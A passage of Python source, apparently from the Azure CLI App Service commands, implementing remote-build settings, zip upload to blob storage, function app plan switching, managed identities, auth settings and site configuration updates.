logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
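# A remote build requires SCM_DO_BUILD_DURING_DEPLOYMENT=true and no
# WEBSITE_RUN_FROM_PACKAGE or ENABLE_ORYX_BUILD settings; the helper below
# applies those changes and then polls the SCM site until they are visible there.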
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
        raise CLIError('Could not find an \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except DefaultErrorResponseException as ex:
if ex.response.status_code != 200:
raise ex
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
    general_switch_msg = 'Currently the switch is only allowed between Consumption and Elastic Premium plans.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise ValidationError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
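# Translates the identities argument list into the ARM identity payload: the
# MSI_LOCAL_ID sentinel (or an empty list) selects the system-assigned identity,
# and anything else is treated as a user-assigned identity resource id.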
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
    # note: getargvalues is already used in azure.cli.core.commands,
    # and there is no simple functional replacement for this deprecated method on 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
# API Version 2019-08-01 (latest as of writing this code) does not return slot instances, however 2018-02-01 does
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot,
api_version="2018-02-01")
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check whether the app settings have propagated correctly to the Kudu site by calling its api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Returns True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
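# Illustrative sketch (hypothetical helper, for documentation only): shows the
# set/dict semantics validate_app_settings_in_scm applies to the Kudu settings.
# The setting names and values below are made up.
def _example_validate_app_settings_semantics():
    scm_settings = {'WEBSITE_NODE_DEFAULT_VERSION': '10.14', 'FOO': 'bar'}
    should_have = ['FOO']                  # every listed name must be present
    should_not_have = ['REMOVED_SETTING']  # none of these names may be present
    should_contain = {'FOO': 'bar'}        # these names must map to these exact values
    return (set(should_have).issubset(scm_settings) and
            not set(should_not_have).intersection(scm_settings) and
            all(scm_settings.get(k) == v for k, v in should_contain.items()))  # True here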
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
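# Illustrative sketch (hypothetical helper, for documentation only): expected
# outputs of _format_fx_version for a few representative inputs; the image
# names used here are made up.
def _example_format_fx_version():
    assert _format_fx_version('nginx:latest') == 'DOCKER|nginx:latest'
    # an explicit container config type takes precedence over the default DOCKER prefix
    assert _format_fx_version('<base64-config>', 'COMPOSE') == 'COMPOSE|<base64-config>'
    # a registry URL is accepted with or without the scheme
    assert _format_fx_version('https://myacr.azurecr.io/app:v1') == 'DOCKER|myacr.azurecr.io/app:v1'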
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
    # Base64-encode the file contents and return them as a UTF-8 string
return b64encode(config_file_bytes).decode('utf-8')
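# Illustrative sketch (hypothetical helper, for documentation only): round-trips
# a small docker-compose document through the encoding used above and the
# decoding performed by _get_linux_multicontainer_decoded_config. The YAML is made up.
def _example_multicontainer_config_round_trip():
    from base64 import b64decode, b64encode
    compose_yaml = 'version: "3"\nservices:\n  web:\n    image: nginx\n'
    encoded = b64encode(compose_yaml.encode('utf-8')).decode('utf-8')
    linux_fx_version = _format_fx_version(encoded, 'COMPOSE')  # 'COMPOSE|<base64>'
    decoded = b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
    return decoded.decode('utf-8') == compose_yaml  # True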
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
    # note: getargvalues is already used in azure.cli.core.commands,
    # and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
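# Illustrative sketch (hypothetical helper, for documentation only): shows how
# update_site_configs interprets --generic-configurations values, either as a
# JSON object or as a plain key=value pair. json.loads stands in for
# get_json_object here, which is an assumption made for this example.
def _example_generic_configurations_parsing():
    import json
    result = {}
    for s in ['{"alwaysOn": true}', 'minTlsVersion=1.2']:
        try:
            result.update(json.loads(s))    # JSON objects are merged as-is
        except ValueError:
            config_name, value = s.split('=', 1)
            result[config_name] = value     # otherwise treated as key=value
    return result  # {'alwaysOn': True, 'minTlsVersion': '1.2'}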
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
